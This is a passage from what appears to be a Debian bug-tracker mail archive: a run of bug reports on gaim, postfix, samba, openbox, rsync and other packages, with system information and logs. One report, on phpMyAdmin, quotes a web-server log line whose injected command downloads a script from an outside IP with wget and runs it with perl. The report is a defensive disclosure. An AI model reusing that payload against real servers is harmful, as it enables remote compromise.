z25_persistent-cd.rules -rw-r--r-- 1 root root 335 2006-05-02 00:46 z25_persistent-net.rules lrwxrwxrwx 1 root root 33 2006-05-02 00:44 z45_persistent-net-generator.rules -> ../persistent-net-generator.rules lrwxrwxrwx 1 root root 12 2006-02-08 07:24 z50_run.rules -> ../run.rules lrwxrwxrwx 1 root root 16 2006-02-08 07:24 z55_hotplug.rules -> ../hotplug.rules lrwxrwxrwx 1 root root 19 2005-08-11 21:16 z60_alsa-utils.rules -> ../alsa-utils.rules lrwxrwxrwx 1 root root 15 2005-09-20 08:04 z60_hdparm.rules -> ../hdparm.rules lrwxrwxrwx 1 root root 17 2006-02-08 07:37 z60_usbmount.rules -> ../usbmount.rules lrwxrwxrwx 1 root root 33 2006-05-15 00:05 z60_xserver-xorg-input-wacom.rules -> ../xserver-xorg-input-wacom.rules lrwxrwxrwx 1 root root 29 2006-08-19 00:56 z75_cd-aliases-generator.rules -> ../cd-aliases-generator.rules lrwxrwxrwx 1 root root 12 2006-08-19 00:56 z99_hal.rules -> ../hal.rules -- /sys/: /sys/block/fd0/dev /sys/block/hda/dev /sys/block/hdb/dev /sys/block/loop0/dev /sys/block/loop1/dev /sys/block/loop2/dev /sys/block/loop3/dev /sys/block/loop4/dev /sys/block/loop5/dev /sys/block/loop6/dev /sys/block/loop7/dev /sys/block/md0/dev /sys/block/md1/dev /sys/block/md2/dev /sys/block/nbd0/dev /sys/block/nbd10/dev /sys/block/nbd11/dev /sys/block/nbd12/dev /sys/block/nbd13/dev /sys/block/nbd14/dev /sys/block/nbd15/dev /sys/block/nbd1/dev /sys/block/nbd2/dev /sys/block/nbd3/dev /sys/block/nbd4/dev /sys/block/nbd5/dev /sys/block/nbd6/dev /sys/block/nbd7/dev /sys/block/nbd8/dev /sys/block/nbd9/dev /sys/block/ram0/dev /sys/block/ram10/dev /sys/block/ram11/dev /sys/block/ram12/dev /sys/block/ram13/dev /sys/block/ram14/dev /sys/block/ram15/dev /sys/block/ram1/dev /sys/block/ram2/dev /sys/block/ram3/dev /sys/block/ram4/dev /sys/block/ram5/dev /sys/block/ram6/dev /sys/block/ram7/dev /sys/block/ram8/dev /sys/block/ram9/dev /sys/block/sda/dev /sys/block/sda/sda1/dev /sys/block/sda/sda2/dev /sys/block/sda/sda3/dev /sys/block/sdb/dev /sys/block/sdb/sdb1/dev /sys/block/sdb/sdb2/dev /sys/block/sdb/sdb3/dev /sys/block/sdc/dev /sys/block/sdc/sdc1/dev /sys/block/sdc/sdc2/dev /sys/block/sdc/sdc3/dev /sys/block/sdd/dev /sys/block/sdd/sdd1/dev /sys/block/sdd/sdd2/dev /sys/block/sdd/sdd3/dev /sys/block/sde/dev /sys/block/sdf/dev /sys/block/sdg/dev /sys/block/sdh/dev /sys/class/coda/cfs0/dev /sys/class/coda/cfs1/dev /sys/class/coda/cfs2/dev /sys/class/coda/cfs3/dev /sys/class/coda/cfs4/dev /sys/class/cpuid/cpu0/dev /sys/class/cpuid/cpu1/dev /sys/class/i2c-dev/i2c-0/dev /sys/class/i2c-dev/i2c-1/dev /sys/class/i2c-dev/i2c-2/dev /sys/class/i2c-dev/i2c-3/dev /sys/class/ieee1394_protocol/raw1394/dev /sys/class/input/input0/event0/dev /sys/class/input/input1/event1/dev /sys/class/input/input2/event2/dev /sys/class/input/input2/mouse0/dev /sys/class/input/input3/event3/dev /sys/class/input/mice/dev /sys/class/misc/device-mapper/dev /sys/class/misc/microcode/dev /sys/class/misc/nvram/dev /sys/class/misc/pktcdvd/dev /sys/class/misc/psaux/dev /sys/class/misc/rtc/dev /sys/class/misc/vhci/dev /sys/class/msr/msr0/dev /sys/class/msr/msr1/dev /sys/class/scsi_generic/sg0/dev /sys/class/scsi_generic/sg1/dev /sys/class/scsi_generic/sg2/dev /sys/class/scsi_generic/sg3/dev /sys/class/scsi_generic/sg4/dev /sys/class/scsi_generic/sg5/dev /sys/class/scsi_generic/sg6/dev /sys/class/scsi_generic/sg7/dev /sys/class/sound/admmidi/dev /sys/class/sound/adsp/dev /sys/class/sound/amidi/dev /sys/class/sound/audio/dev /sys/class/sound/controlC0/dev /sys/class/sound/dmmidi/dev /sys/class/sound/dsp/dev /sys/class/sound/hwC0D0/dev /sys/class/sound/hwC0D2/dev /sys/class/sound/midiC0D0/dev /sys/class/sound/midiC0D1/dev /sys/class/sound/midiC0D2/dev /sys/class/sound/midi/dev /sys/class/sound/mixer/dev /sys/class/sound/pcmC0D0c/dev /sys/class/sound/pcmC0D0p/dev /sys/class/sound/pcmC0D1c/dev /sys/class/sound/p
Bug#383731: gaim: Gaim segfaults after connection
Package: gaim Version: 1:1.5.0+1.5.1cvs20051015-5 Severity: important Since last update Gaim just segfaults after connection. -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.17-p5ad2e-v2 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-1) (ignored: LC_ALL set to fr_FR) Versions of packages gaim depends on: ii gaim-data 1:1.5.0+1.5.1cvs20051015-5 multi-protocol instant messaging c ii libao20.8.6-4Cross Platform Audio Output Librar ii libaspell15 0.60.4-4 GNU Aspell spell-checker runtime l ii libatk1.0-0 1.12.1-1 The ATK accessibility toolkit ii libaudiofile0 0.2.6-6Open-source version of SGI's audio hi libc6 2.3.6.ds1-2GNU C Library: Shared libraries ii libcairo2 1.2.2-1The Cairo 2D vector graphics libra ii libfontconfig 2.3.2-7generic font configuration library ii libgcrypt11 1.2.2-3LGPL Crypto library - runtime libr ii libglib2.0-0 2.10.3-3 The GLib library of C routines ii libgnutls13 1.4.2-1the GNU TLS library - runtime libr ii libgtk2.0-0 2.8.20-1 The GTK+ graphical user interface ii libgtkspell0 2.0.10-3+b1a spell-checking addon for GTK's T ii libice6 1:1.0.0-3 X11 Inter-Client Exchange library ii libpango1.0-0 1.12.3-1 Layout and rendering of internatio ii libsm61:1.0.0-4 X11 Session Management library ii libstartup-no 0.8-1 library for program launch feedbac ii libx11-6 2:1.0.0-8 X11 client-side library ii libxcursor1 1.1.5.2-5 X cursor management library ii libxext6 1:1.0.0-4 X11 miscellaneous extension librar ii libxfixes31:3.0.1.2-4X11 miscellaneous 'fixes' extensio ii libxi61:1.0.0-5 X11 Input extension library ii libxinerama1 1:1.0.1-4.1X11 Xinerama extension library ii libxrandr22:1.1.0.2-4X11 RandR extension library ii libxrender1 1:0.9.0.2-4X Rendering Extension client libra ii libxss1 1:1.0.1-4 X11 Screen Saver extension library gaim recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#696975: postfix: Postfix 2.10 / Support of Proxy (use with eg: Haproxy) protocol
Package: postfix Version: 2.9.3-2.1 Severity: wishlist Hi, Is it please possible that postfix 2.10 is pushed to debian packages (experimental) or a separate repository ? The proxy protocol is a nice feature (used with haproxy). It is available from postfix 2.10+. Thanks Laurent -- System Information: Debian Release: 7.0 APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 3.7.0-p390 (SMP w/4 CPU cores) Locale: LANG=fr_FR@euro, LC_CTYPE=fr_FR@euro (charmap=ISO-8859-1) (ignored: LC_ALL set to fr_FR) Shell: /bin/sh linked to /bin/bash Versions of packages postfix depends on: ii adduser3.113+nmu3 ii cpio 2.11-8 ii debconf [debconf-2.0] 1.5.48 ii dpkg 1.16.9 ii libc6 2.13-37 ii libdb5.1 5.1.29-5 ii libsasl2-2 2.1.25.dfsg1-6 ii libsqlite3-0 3.7.15-1 ii libssl1.0.01.0.1c-4 ii lsb-base 4.1+Debian9 ii netbase5.0 ii ssl-cert 1.0.32 Versions of packages postfix recommends: ii python 2.7.3-3 Versions of packages postfix suggests: ii bsd-mailx [mail-reader 8.1.2-0.2006cvs-1 ii claws-mail [mail-reade 3.8.1-2 pn dovecot-common ii evolution [mail-reader 3.4.4-1 ii heirloom-mailx [mail-r 12.5-2 ii iceape [mail-reader]2.7.11-1 ii icedove [mail-reader] 10.0.11-1 ii kmail [mail-reader] 4:4.4.11.1+l10n-3+b1 ii libsasl2-modules2.1.25.dfsg1-6 ii mutt [mail-reader] 1.5.21-6.2 pn postfix-cdb pn postfix-doc pn postfix-ldap pn postfix-mysql ii postfix-pcre2.9.3-2.1 pn postfix-pgsql ii procmail3.22-20 pn resolvconf pn sasl2-bin ii thunderbird [mail-read 3.1.9~hg20110206r5951+nobinonly-0ubuntu1~umd1~lucid ii thunderbird-3.0 [mail- 3.0~b2+nobinonly-0ubuntu1~fta1~intrepid ii thunderbird-3.1 [mail- 3.1~a1~hg20091122r4427+nobinonly-0ubuntu1~umd1 ii thunderbird-trunk [mai 20.0~a1~hg20121210r11681.115619-0ubuntu1~umd1~lucid pn ufw -- debconf information excluded -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#628833: xserver-xorg-input-synaptics: Scrolling broken since 1.4.x
On 02/06/2011 00:36, Mattia Dongili wrote: On Wed, Jun 01, 2011 at 07:35:19PM +0200, Laurent CARON wrote: Package: xserver-xorg-input-synaptics Version: 1.4.0-1+b1 Severity: normal Hi, Since this version i can't use the vertical/horizontal scrolling areas from my laptop (Sony Vaio Z1 series) your xorg.conf is broken Section "InputDevice" Identifier "Synaptics Touchpad" Driver "synaptics" Option "SendCoreEvents" "true" Option "Device" "/dev/psaux" Option "Protocol""auto-dev" Option "HorizScrollDelta""0" Option "ZAxisMapping""4 5 6 7" Option "TapButton1" "1" Option "VertEdgeScroll" "true" Option "HorizEdgeScroll" "true" Option "VertTwoFingerScroll" "true" Option "HorizTwoFingerScroll""true" EndSection you should use MatchIsTouchpad "true" rather than assigning devices manually. See below the log that your configuration generates: ... [ 2186.229] (II) Using input driver 'synaptics' for 'Synaptics Touchpad' [ 2186.229] (II) Loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 2186.229] (**) Option "SendCoreEvents" "true" [ 2186.229] (**) Synaptics Touchpad: always reports core events [ 2186.229] (**) Option "Device" "/dev/psaux" [ 2186.234] (--) Synaptics Touchpad: invalid x-axis range. defaulting to 1615 - 5685 [ 2186.234] (--) Synaptics Touchpad: invalid y-axis range. defaulting to 1729 - 4171 [ 2186.234] (--) Synaptics Touchpad: invalid pressure range. defaulting to 0 - 256 [ 2186.234] (--) Synaptics Touchpad: invalid finger width range. defaulting to 0 - 16 [ 2186.234] (**) Option "HorizScrollDelta" "0" [ 2186.234] (**) Option "VertEdgeScroll" "true" [ 2186.234] (**) Option "HorizEdgeScroll" "true" [ 2186.234] (**) Option "VertTwoFingerScroll" "true" [ 2186.234] (**) Option "HorizTwoFingerScroll" "true" [ 2186.234] (**) Option "TapButton1" "1" [ 2186.254] (EE) Query no Synaptics: 6003C8 [ 2186.254] (--) Synaptics Touchpad: no supported touchpad found [ 2186.254] (EE) Synaptics Touchpad Unable to query/initialize Synaptics hardware. [ 2186.258] (EE) PreInit returned 11 for "Synaptics Touchpad" [ 2186.258] (II) UnloadModule: "synaptics" [ 2186.258] (II) Unloading synaptics Additionally you also prevent auto adding devices: [ 2186.278] (II) config/udev: Adding input device Video Bus (/dev/input/event2) [ 2186.278] (II) AutoAddDevices is off - not adding device. [ 2186.280] (II) config/udev: Adding input device Sony Vaio Keys (/dev/input/event6) [ 2186.280] (II) AutoAddDevices is off - not adding device. [ 2186.287] (II) config/udev: Adding input device Power Button (/dev/input/event1) [ 2186.287] (II) AutoAddDevices is off - not adding device. [ 2186.287] (II) config/udev: Adding input device Lid Switch (/dev/input/event0) [ 2186.287] (II) AutoAddDevices is off - not adding device. [ 2186.292] (II) config/udev: Adding input device UVC Camera (05ca:18b7) (/dev/input/event8) [ 2186.292] (II) AutoAddDevices is off - not adding device. [ 2186.295] (II) config/udev: Adding input device HDA Intel Headphone (/dev/input/event10) [ 2186.295] (II) AutoAddDevices is off - not adding device. [ 2186.295] (II) config/udev: Adding input device HDA Intel Mic (/dev/input/event9) [ 2186.295] (II) AutoAddDevices is off - not adding device. [ 2186.306] (II) config/udev: Adding input device AT Translated Set 2 keyboard (/dev/input/event4) [ 2186.306] (II) AutoAddDevices is off - not adding device. [ 2186.306] (II) config/udev: Adding input device SynPS/2 Synaptics TouchPad (/dev/input/event5) [ 2186.306] (II) AutoAddDevices is off - not adding device. [ 2186.306] (II) config/udev: Adding input device SynPS/2 Synaptics TouchPad (/dev/input/mouse0) [ 2186.306] (II) AutoAddDevices is off - not adding device. [ 2186.307] (II) config/udev: Adding input device PC Speaker (/dev/input/event3) [ 2186.307] (II) AutoAddDevices is off - not adding device. [ 2186.315] (II) config/udev: Adding input device ACPI Virtual Keyboard Device (/dev/input/event11) [ 2186.315] (II) AutoAddDevices is off - not adding device. [ 2186.315] (II) config/udev: Adding input device Sony Vaio Jogdial (/dev/input/event7) [ 2186.315] (II) AutoAddDevices is off - not adding device. [ 2186.315] (II) config/udev: Adding input device Sony Vaio Jogdial (/dev/input/mouse1) [ 2186.315] (II) AutoAddDevices is off - not adding device. Hi, If autoadd is on, then using the up arrow key generates a printscreen event :( -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#714962: samba: Samba either version in wheezy or version in backports fail with shadow_copy2
Package: samba Version: 2:3.6.15-1~bpo70+1 Severity: important Dear Maintainer, After upgrading to wheezy the module shadow_copy2 does not work as expected (nothing is visible in windows tab for previous versions). Error message is: shadow:snapdir not found for /home in get_shadow_copy_data Thanks Laurent -- System Information: Debian Release: 7.1 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 3.7.5-r510-r720xd-pe840-ml150g3-ml310g5-dl180g6 (SMP w/4 CPU cores) Locale: LANG=fr_FR@euro, LC_CTYPE=fr_FR@euro (charmap=ISO-8859-15) (ignored: LC_ALL set to fr_FR@euro) Shell: /bin/sh linked to /bin/dash Versions of packages samba depends on: ii adduser3.113+nmu3 ii debconf [debconf-2.0] 1.5.49 ii dpkg 1.16.10 ii libacl12.2.51-8 ii libattr1 1:2.4.46-8 ii libc6 2.13-38 ii libcap21:2.22-1.2 ii libcomerr2 1.42.5-1.1 ii libcups2 1.5.3-5 ii libgssapi-krb5-2 1.10.1+dfsg-5+deb7u1 ii libk5crypto3 1.10.1+dfsg-5+deb7u1 ii libkrb5-3 1.10.1+dfsg-5+deb7u1 ii libldap-2.4-2 2.4.31-1+nmu2 ii libpam-modules 1.1.3-7.1 ii libpam-runtime 1.1.3-7.1 ii libpam0g 1.1.3-7.1 ii libpopt0 1.16-7 ii libtalloc2 2.0.7+git20120207-1 ii libtdb11.2.10-2 ii libwbclient0 2:3.6.15-1~bpo70+1 ii lsb-base 4.1+Debian8+deb7u1 ii procps 1:3.3.3-3 ii samba-common 2:3.6.15-1~bpo70+1 ii update-inetd 4.43 ii zlib1g 1:1.2.7.dfsg-13 Versions of packages samba recommends: ii logrotate 3.8.1-4 ii tdb-tools 1.2.10-2 Versions of packages samba suggests: pn ctdb pn ldb-tools pn openbsd-inetd | inet-superserver ii smbldap-tools 0.9.7-1 ii winbind 2:3.6.15-1~bpo70+1 -- debconf information excluded -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#456146: fiaif: Allow the admin to chose reserved bandwidth for TC_VOIP
Package: fiaif Version: 1.21.1-6 Severity: wishlist Hi, The TC_VOIP config option works very well, I however have to manually edit traffic-shaping.sh to guarantee more than 128kb for VOIP. 128kb is too little for some of my remote sites where I may need to get 1Mb guaranteed for it. eg: TC_VOIP_BW=1024 Thanks Laurent -- Package-specific info: -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.20-a7n-v3 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Shell: /bin/sh linked to /bin/bash Versions of packages fiaif depends on: ii bash3.1dfsg-8The GNU Bourne Again SHell ii coreutils 5.97-5.3 The GNU core utilities ii cron3.0pl1-100 management of regular background p ii debconf [debconf-2.0] 1.5.13 Debian configuration management sy ii debianutils 2.18 Miscellaneous utilities specific t ii dnsutils1:9.4.1-1Clients provided with BIND ii grep2.5.1.ds2-6 GNU grep, egrep and fgrep ii iptables1.3.6.0debian1-5 administration tools for packet fi ii logtail 1.2.55 Print log file lines that have not ii net-tools 1.60-17 The NET-3 networking toolkit ii sed 4.1.5-1 The GNU sed stream editor ii wget1.10.2-3 retrieves files from the web fiaif recommends no packages. -- debconf information excluded -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#365721: nfs-common: Creating statd directory under /home
Package: nfs-common Version: 1:1.0.7-10 Severity: normal This is a real problem to create a directory under /home -> It is not really clean -> My /home is nfs mounted (autofs) and thus installation fails. Thanks to fix it ;) Laurent -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.16-gx280 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) (ignored: LC_ALL set to [EMAIL PROTECTED]) Versions of packages nfs-common depends on: ii adduser 3.87 Add and remove users and groups ii libc6 2.3.6-7GNU C Library: Shared libraries ii libcomerr21.38+1.39-WIP-2006.04.09-1 common error description library ii libevent1 1.1a-1 An asynchronous event notification ii libkrb53 1.4.3-7MIT Kerberos runtime libraries ii libnfsidmap1 0.13-1 An nfs idmapping library ii libwrap0 7.6.dbs-9 Wietse Venema's TCP wrappers libra ii portmap 5-18 The RPC portmapper ii sysvinit 2.86.ds1-14System-V-like init utilities nfs-common recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#365946: openbox: Openbox menu are unable to launch X apps except terminal
Package: openbox Version: 3.2-9 Severity: grave Justification: renders package unusable Since last dist-upgrade, my openbox menux are inactive. I mean i'm able to launch x terminal emuilator, but no other app launches. Laurent -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.16-p5ad2e-v7 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-1) (ignored: LC_ALL set to fr_FR) Versions of packages openbox depends on: hi libc6 2.3.6-7 GNU C Library: Shared libraries ii libfontconfig1 2.3.2-5.1 generic font configuration library ii libglib2.0-0 2.10.2-2 The GLib library of C routines ii libice61:1.0.0-3 X11 Inter-Client Exchange library ii libsm6 1:1.0.0-4 X11 Session Management library ii libstartup-notification0 0.8-1 library for program launch feedbac ii libx11-6 2:1.0.0-6 X11 client-side library ii libxext6 1:1.0.0-4 X11 miscellaneous extension librar ii libxft22.1.8.2-6 FreeType-based font drawing librar ii libxinerama1 1:1.0.1-4 X11 Xinerama extension library ii libxml22.6.24.dfsg-1 GNOME XML library ii zlib1g 1:1.2.3-11compression library - runtime Versions of packages openbox recommends: ii obconf1.5-3 Preferences manager for Openbox -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#365946: Acknowledgement (openbox: Openbox menu are unable to launch X apps except terminal)
Debian Bug Tracking System wrote: Thank you for the problem report you have sent regarding Debian. This is an automatically generated reply, to let you know your message has been received. It is being forwarded to the package maintainers and other interested parties for their attention; they will reply in due course. Your message has been sent to the package maintainer(s): Tollef Fog Heen <[EMAIL PROTECTED]> If you wish to submit further information on your problem, please send it to [EMAIL PROTECTED] (and *not* to [EMAIL PROTECTED]). Please do not reply to the address at the top of this message, unless you wish to report a problem with the Bug-tracking system. Debian bug tracking system administrator (administrator, Debian Bugs database) Problem seems solved by the latest dist-upgrade done just a few mins ago. Thanks -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#380175: bzip2: Bzip2 is now in /bin which makes some other packages (amavisd-new / clamav) to fail
Package: bzip2 Version: 1.0.3-3 Severity: important bzip2 in /bin makes calls to /usr/bin/bzip2 fail which is a serious bug. -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.17-a7n-v3 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages bzip2 depends on: ii libbz2-1.01.0.3-3high-quality block-sorting file co bzip2 recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#524279: shorewall-perl: Shorewall fails to start with ERROR: Internal Error in emit : /etc/shorewall/nat (line 2)
Package: shorewall-perl Version: 4.2.7-1 Severity: important Hi, I'm unable to use 1:1 nat with the version in SID because of this known bug. Can you please say me if you have planned a release about the latest version of shorewall since I'm in need of 1:1 NAT ? Thanks for your help. Laurent -- System Information: Debian Release: 5.0 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.28.6-p390-20090217 (SMP w/4 CPU cores) Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15) Shell: /bin/sh linked to /bin/bash Versions of packages shorewall-perl depends on: ii perl-modules 5.10.0-19 Core Perl modules ii shorewall-common 4.2.7-1Shoreline Firewall, netfilter conf shorewall-perl recommends no packages. shorewall-perl suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
Package: phpmyadmin Version: 4:2.11.8.1-5+lenny1 Severity: critical Tags: security Justification: root security hole Hi, After looking at my logs, I did notice a lot of attempts to break in phpmyadmin through the following kind of url: 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null&; It seems PHPMyAdmin shipped with Lenny is still vulnerable to this remote exploit It is basically an IRC bot -- System Information: Debian Release: 5.0.2 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.28.6-p390-20090217 (SMP w/4 CPU cores) Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15) Shell: /bin/sh linked to /bin/bash Versions of packages phpmyadmin depends on: ii debconf [debconf-2 1.5.24Debian configuration management sy ii libapache2-mod-php 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii perl 5.10.0-19 Larry Wall's Practical Extraction ii php5 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii php5-cgi 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti ii php5-mcrypt5.2.6.dfsg.1-1+lenny3 MCrypt module for php5 ii php5-mysql 5.2.6.dfsg.1-1+lenny3 MySQL module for php5 Versions of packages phpmyadmin recommends: ii apache22.2.9-10+lenny3 Apache HTTP Server metapackage ii apache2-mpm-prefor 2.2.9-10+lenny3 Apache HTTP Server - traditional n ii php5-gd5.2.6.dfsg.1-1+lenny3 GD module for php5 Versions of packages phpmyadmin suggests: ii mysql-server-5.0 [mysq 5.0.51a-24+lenny1 MySQL database server binaries -- debconf information: phpmyadmin/setup-username: admin * phpmyadmin/reconfigure-webserver: phpmyadmin/restart-webserver: false -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#536224: /usr/bin/top: Top segfaults since latest dist-upgrade
Package: procps Version: 1:3.2.8-1 Severity: important File: /usr/bin/top Hi, Top segfaults since latest dist-upgrade: donald:~% top zsh: segmentation fault top donald:~% Thanks -- System Information: Debian Release: squeeze/sid APT prefers unstable-i386 APT policy: (500, 'unstable-i386'), (500, 'transitional-i386'), (500, 'transitional'), (500, 'stable-i386'), (500, 'oldstable-i386'), (500, 'oldstable'), (500, 'unstable'), (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.25-2-amd64 (SMP w/2 CPU cores) Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15) (ignored: LC_ALL set to fr...@euro) Shell: /bin/sh linked to /bin/bash Versions of packages procps depends on: ii libc6 2.9-19 GNU C Library: Shared libraries ii libncurses5 5.7+20090606-1 shared libraries for terminal hand ii lsb-base 3.2-22 Linux Standard Base 3.2 init scrip Versions of packages procps recommends: ii psmisc22.7-1 utilities that use the proc file s procps suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#430735: libpam-ssh fails to operate properly since latest dist-upgrade
Package: libpam-ssh Version: 1.91.0-9.1 Severity: important Hi, Since my last dist-upgrade (a few days ago), libpam-ssh is not anymore behaving the "old good" way. It is started from /etc/pam.d/gdm in my case, and was decyphering my ssh keys properly. >From now i have to type my password twice (once for gdm and once more under my desktop environment. The only strange things in /var/log/auth.log is: Jun 27 00:32:09 [EMAIL PROTECTED] ssh-agent[4516]: error: Unknown message 252 Thanks. Laurent -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.21-p5ad2e-v2 (SMP w/2 CPU cores; PREEMPT) Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-1) (ignored: LC_ALL set to fr_FR) Shell: /bin/sh linked to /bin/bash Versions of packages libpam-ssh depends on: ii libc6 2.5-10 GNU C Library: Shared libraries ii libpam0g 0.79-4 Pluggable Authentication Modules l ii libssl0.9.8 0.9.8e-5 SSL shared libraries Versions of packages libpam-ssh recommends: ii ssh 1:4.3p2-10 Secure shell client and server (tr -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#473715: openbox & xrootconsole don't play nice anymore
Anibal Avelar wrote: I tested with openbox 3.4.5-1 and I confirm the program xrootconsole worked fine (the same version). Indeed xrootconsole is a very old program (the latest version was since 2004). The latest changes on openbox 3.4.6.1 to affect its behaviour. Hi, Although (very?) old, wrootconsole is a great tool. root-tail seems more recent, but one feature is missing. Root-tail doesn't allow to display stdin (at least not easily). I was using xrootconsole that way to display remote logs: ssh -t $MAILSERVER "tail -F /var/log/mail.log" | xrootconsole -geo 210x51+1280+0 -fn 6x10 -fg blue --wrap & Thanks for your time & reply. Laurent -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#476786: rsync fails to transfer /var/log/ntpstats/*
Package: rsync Version: 2.6.9-2etch1 Severity: critical Justification: causes serious data loss Hi, I did notice that rsync fails to transfer some files (eg: /var/log/ntpstats/*) and dies on files in that directory on any non-initial run. On the first run, it all goes well. On the subsequent runs: donald:~# rsync -aAzHRxby -vP --exclude='var/log/ntpstats' --numeric-ids --suffix='' --backup-dir=/backup/local/gloups.lncsa.com/2008-04-YY 'gloups.lncsa.com:/{etc,var/log}' /backup/local/gloups.lncsa.com/current receiving file list ... 14452 files to consider ... ... var/log/ntpstats/ var/log/ntpstats/loopstats 884 100%1.59kB/s0:00:00 (xfer#11, to-check=182/14473) var/log/ntpstats/peerstats 8306 100% 14.97kB/s0:00:00 (xfer#12, to-check=172/14473) zsh: segmentation fault rsync -aAzHRxby -vP --numeric-ids --suffix='' rsync: connection unexpectedly closed (120216 bytes received so far) [sender] rsync error: error in rsync protocol data stream (code 12) at io.c(453) [sender=2.6.9] rsync: connection unexpectedly closed (447235 bytes received so far) [receiver] rsync error: error in rsync protocol data stream (code 12) at io.c(453) [receiver=2.6.9] If i now use an exclude (--exclude='var/log/ntpstats'), it finishes without any problem. I did use critical severity because, if you use rsync to make backups... it can be messy to realize your backups are just useless. Thanks Laurent -- System Information: Debian Release: 4.0 APT prefers testing APT policy: (500, 'testing'), (500, 'stable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.23.12-dl380-2g2g-20080105 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) (ignored: LC_ALL set to [EMAIL PROTECTED]) Versions of packages rsync depends on: ii libacl12.2.41-1 Access control list shared library ii libc6 2.3.6.ds1-13etch2 GNU C Library: Shared libraries ii libpopt0 1.10-3lib for parsing cmdline parameters ii lsb-base 3.1-22Linux Standard Base 3.1 init scrip rsync recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#476786: rsync fails to transfer /var/log/ntpstats/*
